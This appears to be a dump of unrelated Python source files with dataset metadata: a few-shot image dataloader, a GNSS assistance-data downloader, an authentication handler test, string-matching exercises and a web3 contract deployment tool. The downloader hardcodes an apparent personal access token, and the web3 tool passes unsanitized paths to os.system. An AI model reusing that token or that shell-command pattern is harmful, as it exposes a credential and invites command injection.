dataset - phase {0}'.format(phase))\n file_train_categories_train_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_train.pickle')\n file_train_categories_val_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_train.pickle')\n file_train_categories_test_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_train.pickle')\n file_val_categories_val_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_val.pickle')\n file_test_categories_test_phase = os.path.join(\n _FC100_DATASET_DIR,\n 'FC100_test.pickle')\n\n if self.phase=='train':\n # During training phase we only load the training phase images\n # of the training categories (aka base categories).\n data_train = load_data(file_train_categories_train_phase)\n self.data = data_train['data']\n self.labels = data_train['labels']\n #print (self.labels)\n self.label2ind = buildLabelIndex(self.labels)\n self.labelIds = sorted(self.label2ind.keys())\n self.num_cats = len(self.labelIds)\n self.labelIds_base = self.labelIds\n self.num_cats_base = len(self.labelIds_base)\n #print (self.data.shape)\n elif self.phase=='val' or self.phase=='test':\n if self.phase=='test':\n # load data that will be used for evaluating the recognition\n # accuracy of the base categories.\n data_base = load_data(file_train_categories_test_phase)\n # load data that will be use for evaluating the few-shot recogniton\n # accuracy on the novel categories.\n data_novel = load_data(file_test_categories_test_phase)\n else: # phase=='val'\n # load data that will be used for evaluating the recognition\n # accuracy of the base categories.\n data_base = load_data(file_train_categories_val_phase)\n # load data that will be use for evaluating the few-shot recogniton\n # accuracy on the novel categories.\n data_novel = load_data(file_val_categories_val_phase)\n\n self.data = np.concatenate(\n [data_base['data'], data_novel['data']], axis=0)\n self.labels = data_base['labels'] + data_novel['labels']\n\n self.label2ind = buildLabelIndex(self.labels)\n self.labelIds = sorted(self.label2ind.keys())\n self.num_cats = len(self.labelIds)\n\n self.labelIds_base = buildLabelIndex(data_base['labels']).keys()\n self.labelIds_novel = 
buildLabelIndex(data_novel['labels']).keys()\n self.num_cats_base = len(self.labelIds_base)\n self.num_cats_novel = len(self.labelIds_novel)\n intersection = set(self.labelIds_base) & set(self.labelIds_novel)\n assert(len(intersection) == 0)\n else:\n raise ValueError('Not valid phase {0}'.format(self.phase))\n\n mean_pix = [x/255.0 for x in [129.37731888, 124.10583864, 112.47758569]]\n\n std_pix = [x/255.0 for x in [68.20947949, 65.43124043, 70.45866994]]\n \n normalize = transforms.Normalize(mean=mean_pix, std=std_pix)\n\n if (self.phase=='test' or self.phase=='val') or (do_not_use_random_transf==True):\n self.transform = transforms.Compose([\n lambda x: np.asarray(x),\n transforms.ToTensor(),\n normalize\n ])\n else:\n self.transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),\n transforms.RandomHorizontalFlip(),\n lambda x: np.asarray(x),\n transforms.ToTensor(),\n normalize\n ])\n\n def __getitem__(self, index):\n img, label = self.data[index], self.labels[index]\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n img = Image.fromarray(img)\n if self.transform is not None:\n img = self.transform(img)\n return img, label\n\n def __len__(self):\n return len(self.data)\n\n\nclass FewShotDataloader():\n def __init__(self,\n dataset,\n nKnovel=5, # number of novel categories.\n nKbase=-1, # number of base categories.\n nExemplars=1, # number of training examples per novel category.\n nTestNovel=15*5, # number of test examples for all the novel categories.\n nTestBase=15*5, # number of test examples for all the base categories.\n batch_size=1, # number of training episodes per batch.\n num_workers=4,\n epoch_size=2000, # number of batches per epoch.\n ):\n\n self.dataset = dataset\n self.phase = self.dataset.phase\n max_possible_nKnovel = (self.dataset.num_cats_base if self.phase=='train'\n else self.dataset.num_cats_novel)\n assert(nKnovel >= 0 and nKnovel < max_possible_nKnovel)\n self.nKnovel = nKnovel\n\n max_possible_nKbase = self.dataset.num_cats_base\n nKbase = nKbase if nKbase >= 0 else max_possible_nKbase\n if self.phase=='train' and nKbase > 0:\n nKbase -= self.nKnovel\n max_possible_nKbase -= self.nKnovel\n\n assert(nKbase >= 0 and nKbase <= max_possible_nKbase)\n self.nKbase = nKbase\n\n self.nExemplars = nExemplars\n self.nTestNovel = nTestNovel\n self.nTestBase = nTestBase\n self.batch_size = batch_size\n self.epoch_size = epoch_size\n self.num_workers = num_workers\n self.is_eval_mode = (self.phase=='test') or (self.phase=='val')\n\n def sampleImageIdsFrom(self, cat_id, sample_size=1):\n \"\"\"\n Samples `sample_size` number of unique image ids picked from the\n category `cat_id` (i.e., self.dataset.label2ind[cat_id]).\n\n Args:\n cat_id: a scalar with the id of the category from which images will\n be sampled.\n sample_size: number of images that will be sampled.\n\n Returns:\n image_ids: a list of length `sample_size` with unique image ids.\n \"\"\"\n assert(cat_id in self.dataset.label2ind)\n assert(len(self.dataset.label2ind[cat_id]) >= sample_size)\n # Note: random.sample samples elements without replacement.\n return random.sample(self.dataset.label2ind[cat_id], sample_size)\n\n def sampleCategories(self, cat_set, sample_size=1):\n \"\"\"\n Samples `sample_size` number of unique categories picked from the\n `cat_set` set of categories. 
`cat_set` can be either 'base' or 'novel'.\n\n Args:\n cat_set: string that specifies the set of categories from which\n categories will be sampled.\n sample_size: number of categories that will be sampled.\n\n Returns:\n cat_ids: a list of length `sample_size` with unique category ids.\n \"\"\"\n if cat_set=='base':\n labelIds = self.dataset.labelIds_base\n elif cat_set=='novel':\n labelIds = self.dataset.labelIds_novel\n else:\n raise ValueError('Not recognized category set {}'.format(cat_set))\n\n assert(len(labelIds) >= sample_size)\n # return sample_size unique categories chosen from labelIds set of\n # categories (that can be either self.labelIds_base or self.labelIds_novel)\n # Note: random.sample samples elements without replacement.\n return random.sample(labelIds, sample_size)\n\n def sample_base_and_novel_categories(self, nKbase, nKnovel):\n \"\"\"\n Samples `nKbase` number of base categories and `nKnovel` number of novel\n categories.\n\n Args:\n nKbase: number of base categories\n nKnovel: number of novel categories\n\n Returns:\n Kbase: a list of length 'nKbase' with the ids of the sampled base\n categories.\n Knovel: a list of lenght 'nKnovel' with the ids of the sampled novel\n categories.\n \"\"\"\n if self.is_eval_mode:\n assert(nKnovel <= self.dataset.num_cats_novel)\n # sample from the set of base categories 'nKbase' number of base\n # categories.\n Kbase = sorted(self.sampleCategories('base', nKbase))\n # sample from the set of novel categories 'nKnovel' number of novel\n # categories.\n Knovel = sorted(self.sampleCategories('novel', nKnovel))\n else:\n # sample from the set of base categories 'nKnovel' + 'nKbase' number\n # of categories.\n cats_ids = self.sampleCategories('base', nKnovel+nKbase)\n assert(len(cats_ids) == (nKnovel+nKbase))\n # Randomly pick 'nKnovel' number of fake novel categories and keep\n # the rest as base categories.\n random.shuffle(cats_ids)\n Knovel = sorted(cats_ids[:nKnovel])\n Kbase = sorted(cats_ids[nKnovel:])\n\n return Kbase, Knovel\n\n def sample_test_examples_for_base_categories(self, Kbase, nTestBase):\n \"\"\"\n Sample `nTestBase` number of images from the `Kbase` categories.\n\n Args:\n Kbase: a list of length `nKbase` with the ids of the categories from\n where the images will be sampled.\n nTestBase: the total number of images that will be sampled.\n\n Returns:\n Tbase: a list of length `nTestBase` with 2-element tuples. 
The 1st\n element of each tuple is the image id that was sampled and the\n 2nd elemend is its category label (which is in the range\n [0, len(Kbase)-1]).\n \"\"\"\n Tbase = []\n if len(Kbase) > 0:\n # Sample for each base category a number images such that the total\n # number sampled images of all categories to be equal to `nTestBase`.\n KbaseIndices = np.random.choice(\n np.arange(len(Kbase)), size=nTestBase, replace=True)\n KbaseIndices, NumImagesPerCategory = np.unique(\n KbaseIndices, return_counts=True)\n\n for Kbase_idx, NumImages in zip(KbaseIndices, NumImagesPerCategory):\n imd_ids = self.sampleImageIdsFrom(\n Kbase[Kbase_idx], sample_size=NumImages)\n Tbase += [(img_id, Kbase_idx) for img_id in imd_ids]\n\n assert(len(Tbase) == nTestBase)\n\n return Tbase\n\n def sample_train_and_test_examples_for_novel_categories(\n self, Knovel, nTestNovel, nExemplars, nKbase):\n \"\"\"Samples train and test examples of the novel categories.\n\n Args:\n \t Knovel: a list with the ids of the novel categories.\n nTestNovel: the total number of test images that will be sampled\n from all the novel categories.\n nExemplars: the number of training examples per novel category that\n will be sampled.\n nKbase: the number of base categories. It is used as offset of the\n category index of each sampled image.\n\n Returns:\n Tnovel: a list of length `nTestNovel` with 2-element tuples. The\n 1st element of each tuple is the image id that was sampled and\n the 2nd element is its category label (which is in the range\n [nKbase, nKbase + len(Knovel) - 1]).\n Exemplars: a list of length len(Knovel) * nExemplars of 2-element\n tuples. The 1st element of each tuple is the image id that was\n sampled and the 2nd element is its category label (which is in\n the ragne [nKbase, nKbase + len(Knovel) - 1]).\n \"\"\"\n\n if len(Knovel) == 0:\n return [], []\n\n nKnovel = len(Knovel)\n Tnovel = []\n Exemplars = []\n assert((nTestNovel % nKnovel) == 0)\n nEvalExamplesPerClass = int(nTestNovel / nKnovel)\n\n for Knovel_idx in range(len(Knovel)):\n imd_ids = self.sampleImageIdsFrom(\n Knovel[Knovel_idx],\n sample_size=(nEvalExamplesPerClass + nExemplars))\n\n imds_tnovel = imd_ids[:nEvalExamplesPerClass]\n imds_ememplars = imd_ids[nEvalExamplesPerClass:]\n\n Tnovel += [(img_id, nKbase+Knovel_idx) for img_id in imds_tnovel]\n Exemplars += [(img_id, nKbase+Knovel_idx) for img_id in imds_ememplars]\n assert(len(Tnovel) == nTestNovel)\n assert(len(Exemplars) == len(Knovel) * nExemplars)\n random.shuffle(Exemplars)\n\n return Tnovel, Exemplars\n\n def sample_episode(self):\n \"\"\"Samples a training episode.\"\"\"\n nKnovel = self.nKnovel\n nKbase = self.nKbase\n nTestNovel = self.nTestNovel\n nTestBase = self.nTestBase\n nExemplars = self.nExemplars\n\n Kbase, Knovel = self.sample_base_and_novel_categories(nKbase, nKnovel)\n Tbase = self.sample_test_examples_for_base_categories(Kbase, nTestBase)\n Tnovel, Exemplars = self.sample_train_and_test_examples_for_novel_categories(\n Knovel, nTestNovel, nExemplars, nKbase)\n\n # concatenate the base and novel category examples.\n Test = Tbase + Tnovel\n random.shuffle(Test)\n Kall = Kbase + Knovel\n\n return Exemplars, Test, Kall, nKbase\n\n def createExamplesTensorData(self, examples):\n \"\"\"\n Creates the examples image and label tensor data.\n\n Args:\n examples: a list of 2-element tuples, each representing a\n train or test example. 
The 1st element of each tuple\n is the image id of the example and 2nd element is the\n category label of the example, which is in the range\n [0, nK - 1], where nK is the total number of categories\n (both novel and base).\n\n Returns:\n images: a tensor of shape [nExamples, Height, Width, 3] with the\n example images, where nExamples is the number of examples\n (i.e., nExamples = len(examples)).\n labels: a tensor of shape [nExamples] with the category label\n of each example.\n \"\"\"\n images = torch.stack(\n [self.dataset[img_idx][0] for img_idx, _ in examples], dim=0)\n labels = torch.LongTensor([label for _, label in examples])\n return images, labels\n\n def get_iterator(self, epoch=0):\n rand_seed = epoch\n random.seed(rand_seed)\n np.random.seed(rand_seed)\n def load_function(iter_idx):\n Exemplars, Test, Kall, nKbase = self.sample_episode()\n Xt, Yt = self.createExamplesTensorData(Test)\n Kall = torch.LongTensor(Kall)\n if len(Exemplars) > 0:\n Xe, Ye = self.createExamplesTensorData(Exemplars)\n return Xe, Ye, Xt, Yt, Kall, nKbase\n else:\n return Xt, Yt, Kall, nKbase\n\n tnt_dataset = tnt.dataset.ListDataset(\n elem_list=range(self.epoch_size), load=load_function)\n data_loader = tnt_dataset.parallel(\n batch_size=self.batch_size,\n num_workers=(0 if self.is_eval_mode else self.num_workers),\n shuffle=(False if self.is_eval_mode else True))\n\n return data_loader\n\n def __call__(self, epoch=0):\n return self.get_iterator(epoch)\n\n def __len__(self):\n return int(self.epoch_size / self.batch_size)\n","sub_path":"data/FC100.py","file_name":"FC100.py","file_ext":"py","file_size_in_byte":17153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"235679511","text":"#!/usr/bin/env python3\n\n# Get AssistNow Online data\n# Valid for 2-4 hours\n# Size: 1-3 KB\n# Improves TTFF to 3 seconds (typical)\n\n# curl https://online-live1.services.u-blox.com/GetOnlineData.ashx?token=kdIs4xBnwEivvK3aQJtY9g;gnss=gps,glo;datatype=eph,alm,aux;\n\n# AssistNow Online servers:\n# https://online-live1.services.u-blox.com\n# https://online-live2.services.u-blox.com\n\n# Token (Mapper - John Kua): kdIs4xBnwEivvK3aQJtY9g\n\nimport requests\nimport datetime\nimport os\n\nvalidGnss = ['gps', 'qzss', 'glo', 'bds', 'gal']\nvalidDatatypes = ['eph', 'alm', 'aux', 'pos']\n\ndef getOnlineData(hostUrl, token, gnss=['gps', 'glo'], datatypes=['eph', 'alm', 'aux']):\n for g in gnss:\n if g not in validGnss:\n raise ValueError('{} is not a valid GNSS! Must be one of {}'.format(g, validGnss))\n for d in datatypes:\n if d not in validDatatypes:\n raise ValueError('{} is not a valid datatype! Must be one of {}'.format(d, validDatatypes))\n\n\n url = hostUrl\n url += '/GetOnlineData.ashx?'\n url += 'token={};'.format(token)\n url += 'datatype={};'.format(','.join(datatypes))\n url += 'format=mga;'\n url += 'gnss={};'.format(','.join(gnss))\n response = requests.get(url)\n\n if not response.ok:\n raise Exception('Failed to get data from {}'.format(hostUrl))\n\n return response.content\n\n\nif __name__=='__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', '-d', default=None)\n parser.add_argument('--hostUrl', '-H', default='https://online-live1.services.u-blox.com')\n parser.add_argument('--token', '-t', default='kdIs4xBnwEivvK3aQJtY9g')\n parser.add_argument('--outputPath', '-o', default='.', help='Output path')\n args = parser.parse_args()\n\n print('\\nQuerying for AssistNow Online data...')\n downloadDt = datetime.datetime.utcnow()\n data = getOnlineData(args.hostUrl, token='kdIs4xBnwEivvK3aQJtY9g')\n print('\\nReceived {} bytes.'.format(len(data)))\n\n outputFileName = os.path.join(args.outputPath, 'assistNowOnline_{}.bin'.format(downloadDt.strftime('%Y%m%dT%H%M%SZ')))\n print('\\nSaving to {}'.format(outputFileName))\n\n with open(outputFileName, 'wb') as f:\n f.write(data)\n\n print('\\nDone.')\n ","sub_path":"get-assistnowonlinedata.py","file_name":"get-assistnowonlinedata.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"339575372","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2019 RERO.\n#\n# Swiss Open Access Repository is free software; you can redistribute it\n# and/or modify it under the terms of the MIT License; see LICENSE file for\n# more details.\n\n\"\"\"Test authenticator handler.\"\"\"\n\nimport pytest\n\nfrom sonar.modules.shibboleth_authenticator.handlers import \\\n authorized_signup_handler\n\n\ndef test_authorized_signup_handler(app, valid_sp_configuration,\n valid_attributes, monkeypatch):\n \"\"\"Test signup handler.\"\"\"\n app.config.update(SHIBBOLETH_SERVICE_PROVIDER=valid_sp_configuration)\n\n class MockResponse(object):\n \"\"\"Mock SAML auth object.\"\"\"\n\n def get_attributes(self):\n \"\"\"Return valid attributes for authentication.\"\"\"\n return valid_attributes\n\n auth = MockResponse()\n\n # Unavailable configuration\n with pytest.raises(KeyError):\n authorized_signup_handler(auth)\n\n # Test valid configuration\n assert authorized_signup_handler(auth, 'idp').status_code == 302\n\n # Test redirect to next url\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.get_session_next_url',\n lambda remote_app: '/test/')\n response = authorized_signup_handler(auth, 'idp')\n assert response.status_code == 302\n assert '/test/' in response.location\n\n class MockUser(object):\n \"\"\"Mock user.\"\"\"\n\n def is_authenticated(self):\n \"\"\"Return if user is authenticated.\"\"\"\n return False\n\n # Test oauth authentication failure\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.oauth_authenticate',\n lambda remote, user, require_existing_link: False)\n response = authorized_signup_handler(auth, 'idp')\n assert response.status_code == 302\n assert '/login/' in response.location\n\n # Test oauth register failure\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.current_user',\n MockUser())\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.oauth_get_user',\n lambda remote, account_info: None)\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.oauth_register',\n lambda form: None)\n response = authorized_signup_handler(auth, 'idp')\n assert response.status_code == 302\n assert '/login/' in response.location\n","sub_path":"tests/ui/shibboleth_authenticator/test_shibboleth_handlers.py","file_name":"test_shibboleth_handlers.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"581767705","text":"import sys\n\nwith open(sys.argv[1], 'r') as test_cases:\n for test in test_cases:\n l = test.strip().split(\" \")\n try:\n elem = min(list(filter(lambda x: l.count(x) == 1 , l)))\n print(l.index(elem)+1)\n except ValueError:\n print(0)\n","sub_path":"uniq.py","file_name":"uniq.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"421508092","text":"# python3\r\nimport sys\r\n\r\nTERM = '$'\r\n\r\n\r\n# e.g. {0:{'A':1,'T':2},1:{'C':3}}\r\ndef build_trie(patterns):\r\n tree = {0: {}}\r\n id_counter = 0\r\n\r\n for pattern in patterns:\r\n curr_node_id = 0\r\n for curr_char in pattern:\r\n\r\n # check if node already exists\r\n if curr_char in tree[curr_node_id]:\r\n curr_node_id = tree[curr_node_id][curr_char]\r\n continue\r\n\r\n # new node\r\n id_counter += 1\r\n new_node_id = id_counter\r\n tree[new_node_id] = {}\r\n tree[curr_node_id][curr_char] = new_node_id\r\n curr_node_id = new_node_id\r\n\r\n tree[curr_node_id][TERM] = {}\r\n\r\n return tree\r\n\r\n\r\ndef solve(text, n, patterns):\r\n result = []\r\n trie = build_trie(patterns)\r\n\r\n for i_start in range(len(text)):\r\n i_curr = i_start\r\n curr_char = text[i_curr]\r\n curr_node_id = 0\r\n\r\n while True:\r\n # leaf\r\n if not trie[curr_node_id] or TERM in trie[curr_node_id]:\r\n result.append(i_start)\r\n break\r\n # there is an edge with val == current char, let's move on\r\n elif curr_char in trie[curr_node_id]:\r\n if TERM in trie[curr_node_id]:\r\n result.append(i_start)\r\n break\r\n curr_node_id = trie[curr_node_id][curr_char]\r\n i_curr += 1\r\n curr_char = text[i_curr] if i_curr < len(text) else None\r\n # no pattern for this subtext\r\n else:\r\n break\r\n\r\n return result\r\n\r\n\r\ndef test():\r\n pass\r\n\r\n\r\ndef main():\r\n text = sys.stdin.readline().strip()\r\n n = int(sys.stdin.readline().strip())\r\n patterns = []\r\n for _ in range(n):\r\n patterns += [sys.stdin.readline().strip()]\r\n\r\n ans = solve(text, n, patterns)\r\n\r\n sys.stdout.write(' '.join(map(str, ans)) + '\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n main()","sub_path":"course_04_strings/w01/trie_matching_extended/trie_matching_extended.py","file_name":"trie_matching_extended.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"333024181","text":"import os, sys, time, json, getopt, asyncio\nfrom web3 import Web3\nfrom solc import link_code\n# from solc import compile_files\nfrom solc import compile_source\nfrom web3.middleware import geth_poa_middleware\n\n\ndef myProvider(provider_url, passphrase=\"test\"):\n # web3.py instance\n # w3 = Web3(Web3.EthereumTesterProvider())\n # PoA共识机制下api需要注入PoA中间件\n if 'http' in provider_url:\n w3 = Web3(Web3.HTTPProvider(provider_url))\n else:\n w3 = Web3(Web3.WebsocketProvider(provider_url))\n w3.middleware_stack.inject(geth_poa_middleware, layer=0)\n w3.eth.defaultAccount = w3.eth.accounts[0]\n if passphrase is not None and passphrase != '':\n w3.personal.unlockAccount(w3.eth.defaultAccount, passphrase)\n return w3\n\n\n# 解锁默认账号\ndef unlockAccount(w3, addr, passphrase):\n # set pre-funded account as sender\n w3.personal.unlockAccount(addr, passphrase)\n\n\ndef javait(contract, output, java):\n if output == '' or not os.path.exists(output):\n output = \"./\"\n if os.path.isfile(output):\n output = os.path.dirname(output)\n abifile = os.path.join(output, contract['name'] + '.abi')\n binfile = os.path.join(output, contract['name'] + '.bin')\n with open(abifile, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps(contract['abi']))\n with open(binfile, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps(contract['bytecode']))\n cmd = \"web3j solidity generate %s %s -o %s -p %s\" % (binfile, abifile, output, java)\n os.system(cmd)\n os.remove(abifile)\n os.remove(binfile)\n\n\ndef compiler(source, output, java, mode='file'):\n # 读取合约\n csc = ''\n contracts = []\n if mode != 'file':\n csc = source\n else:\n try:\n with open(source, 'r', encoding='utf-8') as rf:\n csc = rf.read()\n except Exception as ex:\n print('read file error: ' + str(ex))\n try:\n # 编译合约源码\n compiledSol = compile_source(csc)\n # contractId, contractInterface = compiledSol.popitem()\n for contractId, contractInterface in compiledSol.items():\n ctt = {}\n ast = contractInterface['ast']['children']\n for item in ast:\n if len(item['attributes'].keys()) > 2:\n if str(contractId).split(':')[-1] == str(item['attributes']['name']):\n # ctt['name'] = contractId\n ctt['name'] = str(contractId).split(':')[-1]\n ctt['type'] = item['attributes']['contractKind']\n ctt['abi'] = contractInterface['abi']\n ctt['bytecode'] = contractInterface['bin']\n contracts.append(ctt)\n if java != '':\n javait(contracts[-1], output, java)\n if output != '':\n with open(output, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps({'contracts': contracts}))\n except Exception as ex:\n print('compile error: ' + str(ex))\n return contracts\n\n\n# 部署合约\ndef deploy(w3, contracts, params, output, java):\n subaddrs = {}\n contractInfo = {}\n for cont in contracts:\n if '__' not in cont['bytecode']:\n # 生成合约对象\n Contract = w3.eth.contract(abi=cont['abi'], bytecode=cont['bytecode'])\n # 部署合约\n txhash = Contract.constructor().transact(params)\n # 等待合约部署交易完成\n txreceipt = w3.eth.waitForTransactionReceipt(txhash)\n # print(txreceipt)\n if txreceipt['status'] == 1:\n subaddrs[cont['name']] = txreceipt.contractAddress\n contractInfo[cont['name']] = {\n 'name': cont['name'],\n 'address': txreceipt.contractAddress,\n 'abi': cont['abi'],\n 'bytecode': cont['bytecode']\n }\n # print(tx_receipt)\n for cont in contracts:\n if '__' in cont['bytecode']:\n abi = cont['abi']\n bytecode = link_code(cont['bytecode'], subaddrs)\n # 生成合约对象\n Contract = w3.eth.contract(abi=abi, bytecode=bytecode)\n # 部署合约\n txhash = Contract.constructor().transact(params)\n # 
等待合约部署交易��成\n txreceipt = w3.eth.waitForTransactionReceipt(txhash)\n # print(txreceipt)\n if txreceipt['status'] == 1:\n subaddrs[cont['name']] = txreceipt.contractAddress\n # 将合约地址和abi进行json化保存到本地文件\n # print(bytecode)\n contractInfo[cont['name']] = {\n 'name': cont['name'],\n 'address': txreceipt.contractAddress,\n 'abi': cont['abi'],\n 'bytecode': bytecode\n }\n if java != '':\n javait(tuple(contractInfo.values())[-1], output, java)\n if output != '':\n with open(output, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps(contractInfo))\n return contractInfo\n\n\ndef invoke(w3, fr, to, value):\n txhash = w3.eth.sendTransaction({'to': to, 'from': fr, 'value': value})\n txreceipt = w3.eth.waitForTransactionReceipt(txhash)\n if txreceipt['status'] == 1:\n return 'Succ'\n else:\n return 'Fail'\n\n\ndef monitor(w3):\n def handle_event(event, ftype):\n if ftype == 'block':\n print('block'.center(15, ' ').center(100, '-'))\n print(w3.eth.getBlock(event))\n if ftype == 'transaction':\n print('receipt'.center(15, ' ').center(100, '-'))\n print(w3.eth.waitForTransactionReceipt(event))\n print('transaction'.center(15, ' ').center(100, '-'))\n print(w3.eth.getTransaction(event))\n # and whatever\n\n async def log_loop(event_filter, ftype, poll_interval):\n while True:\n for event in event_filter.get_new_entries():\n handle_event(event, ftype)\n await asyncio.sleep(poll_interval)\n\n # block_filter = contract.events.WatchDog.createFilter(fromBlock='latest') # 显示字符串\n block_filter = w3.eth.filter('latest') # 显示字节码\n tx_filter = w3.eth.filter('pending')\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(asyncio.gather(log_loop(block_filter, 'block', 2), log_loop(tx_filter, 'transaction', 2)))\n finally:\n loop.close()\n\n\ndef query(w3, arg):\n try:\n if len(arg) > 2 and arg[:2] == '0x':\n blk = w3.eth.getBlock(arg)\n else:\n blk = w3.eth.getBlock(int(arg))\n return {'query': {'type': 'block', 'block': blk}}\n except Exception as ex:\n try:\n tx = w3.eth.getTransaction(str(arg))\n receipt = w3.eth.getTransactionReceipt(str(arg))\n return {'query': {'type': 'transaction', 'transaction': tx, 'receipt': receipt}}\n except Exception as ex:\n print('query failed: ' + str(ex))\n return {}\n\n\ndef info(w3):\n info = {}\n version = w3.version\n info['version'] = {'api': version.api, 'node': version.node, 'network': version.node, 'ethereum': version.ethereum}\n info['mining'] = w3.eth.mining\n info['syncing'] = w3.eth.syncing\n info['coinbase'] = w3.eth.coinbase\n info['accounts'] = w3.eth.accounts\n info['blocknumber'] = w3.eth.blockNumber\n info['txpool'] = w3.txpool.status\n info['nodeinfo'] = w3.admin.nodeInfo\n info['peers'] = w3.admin.peers\n info['datadir'] = w3.admin.datadir\n info['hashrate'] = w3.eth.hashrate\n info['gaslimit'] = w3.eth.getBlock('latest').gasLimit\n info['gasprice'] = w3.eth.gasPrice\n return info\n\n\ndef usage(mode):\n if mode == 'compile':\n print(\"Usage:%s -c/--compile -f/--fname [-o/--output